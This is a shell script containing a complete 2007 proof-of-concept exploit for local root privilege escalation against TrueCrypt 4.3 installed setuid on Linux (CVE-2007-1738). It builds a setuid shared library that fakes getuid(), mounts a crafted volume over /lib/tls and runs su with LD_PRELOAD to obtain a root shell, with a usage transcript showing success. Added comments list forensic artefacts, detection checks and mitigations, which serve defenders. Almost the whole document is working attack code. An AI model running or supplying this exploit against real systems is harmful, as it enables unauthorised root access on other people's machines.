#!/bin/sh

#
# $Id: raptor_truecrypt,v 1.1.1.1 2007/04/04 11:31:56 raptor Exp $
#
# raptor_truecrypt - setuid truecrypt privilege escalation
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# TrueCrypt 4.3, when installed setuid root, allows local users to cause a 
# denial of service (filesystem unavailability) or gain privileges by mounting 
# a crafted TrueCrypt volume, as demonstrated using (1) /usr/bin or (2) another
# user's home directory, a different issue than CVE-2007-1589 (CVE-2007-1738).
#
# WARNING: THIS IS A PROOF OF CONCEPT EXPLOIT TAKING ADVANTAGE OF NPTL THREAD
# LOCAL STORAGE DYNAMIC LINKING MODEL, DO NOT USE IT IF YOU DON'T KNOW HOW IT
# WORKS! YEAH, IT *DOES* REQUIRE SOME TWEAKINGS TO EXPLOIT NON-TLS PLATFORMS!
#
# Other possible attack vectors: /etc/cron.{d,hourly,daily,weekly,monthly}, at 
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d, and more...
#
# Usage:
# $ tar xvfz raptor_truecrypt.tgz
# $ cd raptor_truecrypt
# $ chmod +x raptor_truecrypt
# $ ./raptor_truecrypt
# raptor_truecrypt - setuid truecrypt privilege escalation
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
# 
# Mounting the evil volume (press enter at password prompt)
# Enter password for '/home/guest/raptor_truecrypt/pwned.tc': 
# # id
# uid=0(root) gid=0(root) groups=0(root)
# # exit
# logout
# Unmounting the evil volume (don't forget to cleanup /tmp)
# $
#
# Vulnerable platforms:
# TrueCrypt <= 4.3 on GNU/Linux (installed in setuid mode)
#

# Proof-of-concept entry point (flat script, no functions, no set -e).
# Defender notes: every step below leaves an artefact on the host that can be
# monitored for, and the whole chain hinges on truecrypt being installed
# setuid root (see "Vulnerable platforms" in the header).
echo "raptor_truecrypt - setuid truecrypt privilege escalation"
echo "Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

# prepare the evil shared library
# Builds a one-function shared object under the predictable path
# /tmp/getuid.{c,so} whose getuid() always reports 0. A shared object carrying
# the setuid bit in /tmp is a high-signal indicator (e.g. a periodic
# `find /tmp -perm -4000 -name '*.so'` check would surface it).
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c
# Status is checked explicitly because the script does not use set -e.
# NOTE: the error text goes to stdout, not stderr.
if [ $? -ne 0 ]; then
	echo "Error: problems compiling evil shared library, check your gcc"
	exit 1
fi

# for setuid binaries only libraries that are also setuid will be loaded
# (This is the loader's secure-execution rule for LD_PRELOAD: presumably the
# entry must be a bare filename, found in a trusted library directory, and the
# file itself setuid -- which is why a trusted directory is the mount target
# below. Confirm against the dynamic loader version of the platform at hand.)
chmod +s /tmp/getuid.so

# mount the evil volume over /lib/tls;)
# The mount is the privileged operation that the setuid truecrypt performs on
# the unprivileged user's behalf. A user-initiated mount onto a system library
# directory is the event to alert on; the mitigation is not to install
# truecrypt setuid, or to use a version newer than 4.3.
echo "Mounting the evil volume (press enter at password prompt)"
truecrypt --keyfile pwned.key pwned.tc /lib/tls
# Non-zero status means /lib/tls is absent or the mount was refused; nothing
# has been changed under /lib/tls yet, so the script exits directly.
if [ $? -ne 0 ]; then
	echo "Error: /lib/tls does not exist or truecrypt is not vulnerable"
	exit 1
fi

# do the trick!
# The symlink lands inside the user-controlled volume now mounted at /lib/tls,
# so the bare LD_PRELOAD name resolves there. Observables: a new symlink in
# /lib/tls pointing into /tmp, and su started with LD_PRELOAD in its
# environment (e.g. visible in /proc/<pid>/environ while it runs).
ln -s /tmp/getuid.so /lib/tls
LD_PRELOAD=getuid.so su -

# cleanup and bye
# Only the symlink is removed and the volume unmounted; /tmp/getuid.c and
# /tmp/getuid.so (still setuid) are left behind, as the message admits, and
# are useful forensic residue. The exit status of these two commands is not
# checked, so a failed unmount leaves /lib/tls shadowed without any notice.
echo "Unmounting the evil volume (don't forget to cleanup /tmp)"
rm -f /lib/tls/getuid.so
truecrypt -d /lib/tls
